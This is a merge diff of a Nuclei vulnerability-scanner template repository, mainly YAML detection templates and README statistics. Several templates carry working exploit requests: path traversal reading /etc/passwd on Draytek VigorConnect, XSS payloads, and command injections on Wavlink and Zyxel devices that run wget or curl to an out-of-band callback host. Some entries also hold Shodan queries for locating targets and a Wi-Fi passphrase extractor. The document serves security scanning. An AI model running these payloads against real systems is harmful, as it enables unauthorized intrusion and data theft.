Merge branch 'master' into dashboard

.new-additions

@@ -1,20 +1,11 @@
-cves/2018/CVE-2018-19326.yaml
+cnvd/2020/CNVD-2020-46552.yaml
-cves/2020/CVE-2020-36510.yaml
+cves/2021/CVE-2021-20123.yaml
-cves/2022/CVE-2022-1040.yaml
+cves/2021/CVE-2021-20124.yaml
-cves/2022/CVE-2022-1221.yaml
+cves/2021/CVE-2021-25075.yaml
-cves/2022/CVE-2022-29548.yaml
+cves/2022/CVE-2022-1392.yaml
-exposed-panels/privx-panel.yaml
+cves/2022/CVE-2022-30489.yaml
-exposed-panels/umbraco-login.yaml
+misconfiguration/oracle-ebusiness-registration-enabled.yaml
-exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
+misconfiguration/unauth-wavink-panel.yaml
-exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
+technologies/kubernetes-operational-view-detect.yaml
-exposures/configs/msmtp-config.yaml
+vulnerabilities/wordpress/seo-redirection-xss.yaml
-misconfiguration/unauthorized-h3csecparh-login.yaml
+workflows/yonyou-nc-workflow.yaml
-technologies/cloudflare-nginx-detect.yaml
-technologies/dedecms-detect.yaml
-technologies/ecology-detect.yaml
-technologies/jspxcms-detect.yaml
-vulnerabilities/other/ecsimagingpacs-rce.yaml
-vulnerabilities/wordpress/age-gate-open-redirect.yaml
-vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
-vulnerabilities/wordpress/wp-security-open-redirect.yaml
-vulnerabilities/wordpress/wp-under-construction-ssrf.yaml

README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1150 | daffainfo     |   560 | cves             |  1154 | info     |  1183 | http    |  3164 |
+| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
-| panel     |   513 | dhiyaneshdk   |   421 | exposed-panels   |   519 | high     |   870 | file    |    68 |
+| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
-| lfi       |   460 | pikpikcu      |   316 | vulnerabilities  |   446 | medium   |   658 | network |    50 |
+| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
-| xss       |   363 | pdteam        |   262 | technologies     |   251 | critical |   411 | dns     |    17 |
+| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
-| wordpress |   358 | geeknik       |   178 | exposures        |   203 | low      |   180 |         |       |
+| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
-| exposure  |   292 | dwisiswant0   |   168 | misconfiguration |   196 | unknown  |     6 |         |       |
+| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
-| rce       |   289 | princechaddha |   130 | workflows        |   186 |          |       |         |       |
+| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   129 | token-spray      |   153 |          |       |         |       |
+| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
-| tech      |   265 | gy741         |   117 | default-logins   |    95 |          |       |         |       |
+| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
-| wp-plugin |   259 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
 
-**260 directories, 3520 files**.
+**261 directories, 3543 files**.
 
 </td>
 </tr>

TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1150 | daffainfo     |   560 | cves             |  1154 | info     |  1183 | http    |  3164 |
+| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
-| panel     |   513 | dhiyaneshdk   |   421 | exposed-panels   |   519 | high     |   870 | file    |    68 |
+| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
-| lfi       |   460 | pikpikcu      |   316 | vulnerabilities  |   446 | medium   |   658 | network |    50 |
+| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
-| xss       |   363 | pdteam        |   262 | technologies     |   251 | critical |   411 | dns     |    17 |
+| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
-| wordpress |   358 | geeknik       |   178 | exposures        |   203 | low      |   180 |         |       |
+| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
-| exposure  |   292 | dwisiswant0   |   168 | misconfiguration |   196 | unknown  |     6 |         |       |
+| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
-| rce       |   289 | princechaddha |   130 | workflows        |   186 |          |       |         |       |
+| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   129 | token-spray      |   153 |          |       |         |       |
+| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
-| tech      |   265 | gy741         |   117 | default-logins   |    95 |          |       |         |       |
+| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
-| wp-plugin |   259 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |

cnvd/2020/CNVD-2020-46552.yaml

@@ -0,0 +1,25 @@
+id: CNVD-2020-46552
+info:
+  name: Sangfor EDR Tool - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+  reference:
+    - https://www.modb.pro/db/144475
+    - https://blog.csdn.net/bigblue00/article/details/108434009
+    - https://cn-sec.com/archives/721509.html
+  tags: cnvd,cnvd2020,sangfor,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "$show_input = function($info)")'
+          - 'contains(body, "$strip_slashes($host)")'
+          - 'contains(body, "Log Helper")'
+          - 'status_code == 200'
+        condition: and

cnvd/2021/CNVD-2021-15822.yaml

@@ -6,6 +6,10 @@ info:
   severity: high
   reference:
     - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
+  metadata:
+    verified: true
+    shodan-query: title:"ShopXO企业级B2C电商系统提供商"
+    fofa-query: app="ShopXO企业级B2C电商系统提供商"
   tags: shopxo,lfi,cnvd,cnvd2021
 
 requests:

cnvd/2021/CNVD-2021-30167.yaml

@@ -7,7 +7,7 @@ info:
   reference:
     - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
     - https://www.cnvd.org.cn/webinfo/show/6491
-  tags: beanshell,rce,cnvd,cnvd2021
+  tags: beanshell,rce,cnvd,cnvd2021,yonyou
 
 requests:
   - raw:
@@ -27,7 +27,6 @@ requests:
 
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "uid="

cves/2010/CVE-2010-0219.yaml

@@ -10,6 +10,8 @@ info:
     - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
   classification:
     cve-id: CVE-2010-0219
+  metadata:
+    shodan-query: http.html:"Apache Axis"
   tags: cve,cve2010,axis,apache,default-login,axis2
 
 requests:

cves/2020/CVE-2020-11978.yaml

@@ -16,6 +16,9 @@ info:
     cvss-score: 8.8
     cve-id: CVE-2020-11978
     cwe-id: CWE-77
+  metadata:
+    verified: true
+    shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
   tags: cve,cve2020,apache,airflow,rce
 
 requests:

cves/2020/CVE-2020-11991.yaml

@@ -15,6 +15,8 @@ info:
     cve-id: CVE-2020-11991
     cwe-id: CWE-611
   remediation: Upgrade to Apache Cocoon 2.1.13 or later.
+  metadata:
+    shodan-query: http.html:"Apache Cocoon"
   tags: cve,cve2020,apache,xml,cocoon,xxe
 
 requests:

cves/2020/CVE-2020-13117.yaml

@@ -13,7 +13,10 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-13117
     cwe-id: CWE-77
-  tags: cve,cve2020,wavlink,rce,oast
+  metadata:
+    verified: true
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: cve,cve2020,wavlink,rce,oast,router
 
 requests:
   - raw:
@@ -26,10 +29,20 @@ requests:
 
         newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
 
+      - type: word
+        part: body
+        words:
+          - "parent.location.replace"
+
+      - type: status
+        status:
+          - 200
+
 # Enhanced by mp on 2022/05/16

cves/2020/CVE-2020-13927.yaml

@@ -15,6 +15,9 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-13927
+  metadata:
+    verified: true
+    shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
   tags: cve,cve2020,apache,airflow,unauth
 
 requests:

cves/2021/CVE-2021-20123.yaml

@@ -0,0 +1,44 @@
+id: CVE-2021-20123
+
+info:
+  name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
+  author: 0x_Akoko
+  severity: high
+  description: |
+    A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-42
+    - https://www.cvedetails.com/cve/CVE-2021-20123/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-20123
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.html:"VigorConnect"
+  tags: cve,cve2021,draytek,lfi,vigorconnect
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
+      - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "for 16-bit app support"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-20124.yaml

@@ -0,0 +1,44 @@
+id: CVE-2021-20124
+
+info:
+  name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
+  author: 0x_Akoko
+  severity: high
+  description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-42
+    - https://www.draytek.com/products/vigorconnect/
+    - https://www.cvedetails.com/cve/CVE-2021-20124
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-20124
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.html:"VigorConnect"
+  tags: cve,cve2021,draytek,lfi,vigorconnect
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
+      - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "for 16-bit app support"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-21402.yaml

@@ -15,6 +15,10 @@ info:
     cvss-score: 6.5
     cve-id: CVE-2021-21402
     cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.html:"Jellyfin"
+    fofa-query: title="Jellyfin" || body="http://jellyfin.media"
   tags: cve,cve2021,jellyfin,lfi
 
 requests:

cves/2021/CVE-2021-25075.yaml

@@ -0,0 +1,60 @@
+id: CVE-2021-25075
+
+info:
+  name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
+  author: DhiyaneshDK
+  severity: low
+  description: |
+    The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
+  remediation: Fixed in version 1.5.1.
+  reference:
+    - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 3.50
+    cve-id: CVE-2021-25075
+    cwe-id: CWE-862
+  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
+
+      - |
+        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
+          - "toplevel_page_wpda_duplicate_post_menu"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-38540.yaml

@@ -14,6 +14,7 @@ info:
     cve-id: CVE-2021-38540
     cwe-id: CWE-306
   metadata:
+    verified: true
     shodan-query: title:"Sign In - Airflow"
   tags: cve,cve2021,apache,airflow,rce
 

cves/2021/CVE-2021-44451.yaml

@@ -11,6 +11,9 @@ info:
   classification:
     cve-id: CVE-2021-44451
   remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
+  metadata:
+    verified: true
+    shodan-query: title:"Superset"
   tags: cve,cve2021,apache,superset,default-login
 
 requests:

cves/2022/CVE-2022-1388.yaml

@@ -25,6 +25,7 @@ info:
 
 variables:
   auth: "admin:"
+  cmd: "echo CVE-2022-1388 | rev"
 
 requests:
   - raw:
@@ -54,10 +55,6 @@ requests:
              "utilCmdArgs": "-c '{{cmd}}'"
         }
 
-    payloads:
-      cmd:
-        - 'echo CVE-2022-1388 | rev'
-
     stop-at-first-match: true
     matchers-condition: and
     matchers:

cves/2022/CVE-2022-1392.yaml

@@ -0,0 +1,36 @@
+id: CVE-2022-1392
+
+info:
+  name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI
+  author: Veshraj
+  severity: high
+  description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues.
+  reference:
+    - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
+    - https://packetstormsecurity.com/files/166534/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-1392
+  metadata:
+    verified: true
+  tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "failed to open stream: No such file or directory"
+          - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-24288.yaml

@@ -15,7 +15,8 @@ info:
     cve-id: CVE-2022-24288
     cwe-id: CWE-78
   metadata:
-    shodan-query: title:"Airflow - DAGs"
+    verified: true
+    shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
   tags: cve,cve2022,airflow,rce
 
 requests:

cves/2022/CVE-2022-30489.yaml

@@ -0,0 +1,40 @@
+id: CVE-2022-30489
+
+info:
+  name: Wavlink Wn535g3 - POST XSS
+  author: For3stCo1d
+  severity: high
+  reference:
+    - https://github.com/badboycxcc/XSS-CVE-2022-30489
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30489
+  metadata:
+    verified: true
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: xss,cve2022,wavlink,cve,router,iot
+  description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi."
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<script>alert(document.domain);</script>'
+          - 'parent.location.replace("http://")'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-30525.yaml

@@ -0,0 +1,35 @@
+id: CVE-2022-30525
+
+info:
+  name: Zyxel Firewall - Unauthenticated RCE
+  author: h1ei1,prajiteshsingh
+  severity: critical
+  description: |
+    The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
+  reference:
+    - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
+    - https://github.com/rapid7/metasploit-framework/pull/16563
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+  metadata:
+    shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
+  tags: rce,zyxel,cve,cve2022,firewall,unauth
+
+requests:
+  - raw:
+      - |
+        POST /ztp/cgi-bin/handler HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 500

exposed-panels/adobe/adobe-component-login.yaml

@@ -9,6 +9,8 @@ info:
     - https://www.exploit-db.com/ghdb/6846
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: panel,adobe,coldfusion
 
 requests:

exposures/files/cold-fusion-cfcache-map.yaml

@@ -6,6 +6,8 @@ info:
   severity: low
   reference:
     - https://securiteam.com/windowsntfocus/5bp081f0ac/
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: exposure,coldfusion,adobe
 
 requests:

miscellaneous/unpatched-coldfusion.yaml

@@ -7,6 +7,8 @@ info:
   reference:
     - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
     - https://twitter.com/Daviey/status/1374070630283415558
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: rce,adobe,misc,coldfusion
 
 requests:

misconfiguration/airflow/airflow-debug.yaml

@@ -4,6 +4,9 @@ info:
   name: Airflow Debug Trace
   author: pdteam
   severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"Airflow - DAGs"
   tags: apache,airflow,fpd
 
 requests:

misconfiguration/oracle-ebusiness-registration-enabled.yaml

@@ -0,0 +1,32 @@
+id: oracle-ebusiness-registration-enabled
+
+info:
+  name: Oracle E-Business Login Panel Registration Accessible
+  author: 3th1c_yuk1,tess
+  severity: info
+  description: Oracle E-Business Login Panel Registration Accessible.
+  reference:
+    - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
+    - https://twitter.com/GodfatherOrwa/status/1514720677173026816
+  metadata:
+    verified: true
+    shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
+  tags: oracle,misconfig
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Registration'
+          - 'Register as individual'
+          - '<!-- ibeCZzpRuntimeIncl.jsp end -->'
+        condition: and
+
+      - type: status
+        status:
+          - 200

misconfiguration/unauth-wavink-panel.yaml

@@ -0,0 +1,44 @@
+id: unauth-wavink-panel
+
+info:
+  name: Unauthenticated Wavlink Panel
+  author: princechaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: exposure,wavlink,unauth,misconfig,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wifi_base.shtml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>APP</title>"
+
+      - type: regex
+        part: body
+        regex:
+          - 'var passphraseKey12="(.*)";'
+
+      - type: word
+        part: body
+        negative: true
+        words:
+          - 'var passphraseKey12="";'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'var passphraseKey12="(.*)";'

technologies/apache/airflow-detect.yaml

@@ -4,6 +4,9 @@ info:
   name: Apache Airflow
   author: pdteam
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Apache Airflow"
   tags: tech,apache,airflow
 
 requests:

technologies/apache/apache-axis-detect.yaml

@@ -5,6 +5,9 @@ info:
   author: dogasantos
   severity: info
   description: Axis and Axis2 detection
+  metadata:
+    verified: true
+    shodan-query: http.html:"Apache Axis"
   tags: tech,axis2,middleware,apache
 
 requests:

technologies/apache/apache-cocoon-detect.yaml

@@ -5,6 +5,8 @@ info:
   author: ffffffff0x
   severity: info
   metadata:
+    verified: true
+    shodan-query: http.html:"Apache Cocoon"
     fofa-query: app="APACHE-Cocoon"
   tags: apache,cocoon,tech
 

technologies/favicon-detection.yaml

@@ -2600,3 +2600,8 @@ requests:
         name: "Gradle-enterprise"
         dsl:
           - "status_code==200 && (\"1614287628\" == mmh3(base64_py(body)))"
+
+      - type: dsl
+        name: "Kubernetes-Operational-View"
+        dsl:
+          - "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))"

technologies/fingerprinthub-web-fingerprints.yaml

@@ -14461,7 +14461,7 @@ requests:
           - /yimioa.apk
 
       - type: word
-        name: yongyou-ism
+        name: yonyou-ism
         words:
           - sheight*window.screen.deviceydpi
 

technologies/jellyfin-detect.yaml

@@ -4,6 +4,9 @@ info:
   name: Jellyfin detected
   author: dwisiswant0
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Jellyfin"
   tags: tech,jellyfin
 
 requests:

technologies/kong-detect.yaml

@@ -2,7 +2,7 @@ id: kong-detect
 
 info:
   name: Detect Kong
-  author: geeknik
+  author: geeknik,joshlarsen
   severity: info
   description: The Cloud-Native API Gateway
   reference:
@@ -14,16 +14,18 @@ requests:
     path:
       - "{{BaseURL}}"
 
-    matchers-condition: and
     matchers:
-
+      - type: word
-      - type: regex
         part: header
-        regex:
+        words:
-          - "[Ss]erver: [Kk]ong+"
+          - "server: kong"
+          - "x-kong-response-latency"
+          - "x-kong-upstream-latency"
+          - "x-kong-proxy-latency"
+        condition: or
+        case-insensitive: true
 
     extractors:
       - type: kval
-        part: header
         kval:
           - server

technologies/kubernetes-operational-view-detect.yaml

@@ -0,0 +1,34 @@
+id: kubernetes-operational-view-detect
+
+info:
+  name: Kubernetes Operational View Detect
+  author: idealphase
+  severity: info
+  reference:
+    - https://github.com/hjacobs/kube-ops-view
+    - https://codeberg.org/hjacobs/kube-ops-view
+  metadata:
+    verified: true
+    shodan-query: http.title:"Kubernetes Operational View"
+  tags: tech,k8s,kubernetes,devops,kube
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Kubernetes Operational View"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '<title>Kubernetes Operational View (.+)<\/title>'

token-spray/api-loqate.yaml

@@ -17,6 +17,8 @@ requests:
     matchers:
       - type: word
         part: body
-        negative: true
         words:
-          - 'Unknown key'
+          - '"Id":'
+          - '"Type":'
+          - '"Text":'
+        condition: and

token-spray/api-moonpay.yaml

@@ -0,0 +1,22 @@
+id: api-moonpay
+
+info:
+  name: MoonPay API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://dashboard.moonpay.com/getting_started
+  tags: token-spray,moonpay,cryptocurrencies
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"accountId":'
+        condition: and

vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml

@@ -6,6 +6,8 @@ info:
   severity: medium
   reference:
     - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  metadata:
+    fofa-query: app="泛微-协同办公OA"
   tags: ecology,upload,fileupload,intrusive
 
 requests:

vulnerabilities/other/coldfusion-debug-xss.yaml

@@ -7,6 +7,8 @@ info:
   description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
   reference:
     - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
+  metadata:
+    shodan-query: http.component:"Adobe ColdFusion"
   tags: adobe,coldfusion,xss
 
 requests:

vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml

@@ -7,6 +7,9 @@ info:
   description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
   reference:
     - https://www.cnblogs.com/milantgh/p/3615986.html
+  metadata:
+    verified: true
+    shodan-query: http.html:"power by dedecms" || title:"dedecms"
   tags: dedecms
 
 requests:

vulnerabilities/other/dedecms-openredirect.yaml

@@ -6,6 +6,9 @@ info:
   severity: low
   reference:
     - https://blog.csdn.net/ystyaoshengting/article/details/82734888
+  metadata:
+    verified: true
+    shodan-query: http.html:"power by dedecms" || title:"dedecms"
   tags: dedecms,redirect
 
 requests:

vulnerabilities/other/ecology-filedownload-directory-traversal.yaml

@@ -4,6 +4,8 @@ info:
   name: Ecology Directory Traversal
   author: princechaddha
   severity: medium
+  metadata:
+    fofa-query: app="泛微-协同办公OA"
   tags: ecology,lfi
 
 requests:

vulnerabilities/other/ecology-syncuserinfo-sqli.yaml

@@ -6,6 +6,8 @@ info:
   severity: high
   reference:
     - https://www.weaver.com.cn/
+  metadata:
+    fofa-query: app="泛微-协同办公OA"
   tags: ecology,sqli
 
 requests:

vulnerabilities/other/ecology-v8-sqli.yaml

@@ -6,6 +6,8 @@ info:
   severity: high
   reference:
     - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
+  metadata:
+    fofa-query: app="泛微-协同办公OA"
   tags: ecology,sqli
 
 requests:

vulnerabilities/other/gnuboard-sms-xss.yaml

@@ -0,0 +1,35 @@
+id: gnuboard-sms-xss
+
+info:
+  name: Gnuboard CMS - SMS Emoticon XSS
+  author: gy741
+  severity: medium
